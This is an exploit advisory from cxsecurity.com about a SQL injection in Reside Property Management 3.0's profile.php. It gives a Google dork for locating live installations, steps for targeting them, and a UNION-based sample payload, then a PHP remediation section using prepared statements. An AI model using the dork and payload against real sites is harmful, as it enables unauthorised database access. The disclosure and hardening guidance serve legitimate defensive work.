Reside Property Management 3.0 profile SQL Injection

2020.06.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Reside Property Management 3.0 - 'profile' SQL Injection
# Date: 2020-06-28
# Google Dork: "Copyright 2020 Reside Property Management"
# Exploit Author: Ultra Security Team (Ashkan Moghaddas, AmirMohammad Safari)
# Team Members: Behzad Khalifeh, Milad Ranjbar
# Vendor Homepage: https://www.13plugins.com/product/reside-v3-rental-property-management-php-script/
# Version: v3.0 [Final Version]
# Tested on: Windows/Linux
# CVE: N/A

.:: Description ::.
RESIDE makes it easy to manage all of your tenants & properties, record payments, and keep everything accessible any time, from any computer or device.

.:: Vulnerable File ::.
profile.php

.:: Vulnerable Code ::.
- Line 21: $profile = $_GET['profile'];
- Line 22: $adminsName = preg_replace('/-/', ' ', $profile);
- Line 90: $sql = "SELECT * FROM admins WHERE adminName = '" . $adminsName . "'";
- Line 91: $result = mysqli_query($mysqli, $sql) or die ('-1' . mysqli_error());

.:: Proof Of Concept (PoC) ::.
Step 1 - Find your target with the above dork.
Step 2 - Find the profile.php file on the target.
Step 3 - Inject your payloads into the profile parameter.

.:: Sample Request ::.
localhost/reside-rental-property-management/Reside/profile.php?profile=-21%27+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26%23
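The root cause in the quoted lines is string concatenation of a GET parameter into the query text: `preg_replace('/-/', ' ', ...)` only swaps dashes for spaces and does nothing about quotes, so a single quote in `profile` closes the string literal and the remainder is parsed as SQL. The following is an added example, not the vendor's code, showing the vulnerable pattern next to a parameterized replacement; `$mysqli` is assumed to be an open mysqli connection, and the table/column names and the `isValidProfileSlug` allow-list are assumptions modelled on the advisory's snippet.

```php
<?php
// Added example (not from the Reside code base): the concatenation pattern
// described in the advisory and a hardened form using a prepared statement.
// Assumes $mysqli is an open mysqli connection and an `admins` table with an
// `adminName` column, as in the quoted profile.php lines.

// --- Vulnerable pattern (profile.php lines 21/22/90/91, paraphrased) ---
// The request value is spliced into the SQL text; a quote in $profile breaks
// out of the literal. The original also echoed mysqli_error() to the client,
// which leaks schema details that make exploitation easier to confirm.
function findAdminUnsafe(mysqli $mysqli, string $profile): ?array
{
    $adminsName = preg_replace('/-/', ' ', $profile);
    $sql = "SELECT * FROM admins WHERE adminName = '" . $adminsName . "'";
    $result = mysqli_query($mysqli, $sql);
    return $result ? (mysqli_fetch_assoc($result) ?: null) : null;
}

// --- Hardened form: bound parameter, no string building ---
// The value is sent separately from the query text, so quote characters and
// UNION keywords are plain data; no escaping of $adminsName is needed.
function findAdminSafe(mysqli $mysqli, string $profile): ?array
{
    $adminsName = str_replace('-', ' ', $profile);
    $stmt = $mysqli->prepare("SELECT * FROM admins WHERE adminName = ?");
    if ($stmt === false) {
        // Log server-side; never return $mysqli->error to the browser.
        error_log('profile lookup prepare failed: ' . $mysqli->error);
        return null;
    }
    $stmt->bind_param('s', $adminsName);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() requires mysqlnd
    $stmt->close();
    return $row ?: null;
}

// Defence in depth (assumed policy): profile slugs are short and consist of
// letters, digits and dashes, so reject anything else before touching the DB.
function isValidProfileSlug(string $profile): bool
{
    return preg_match('/^[A-Za-z0-9-]{1,64}$/', $profile) === 1;
}

// Assumed wiring in profile.php:
$profile = $_GET['profile'] ?? '';
if (!isValidProfileSlug($profile)) {
    http_response_code(400);
    exit('invalid profile');
}
$admin = findAdminSafe($mysqli, $profile);
```

The allow-list is a secondary control only; the prepared statement is what closes CWE-89, since `bind_param('s', ...)` guarantees the value can never alter the statement's structure regardless of its content. Note that the quoted line 91 also calls `mysqli_error()` without the required link argument, which is a separate bug in the vendor's error path.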


Copyright 2020, cxsecurity.com
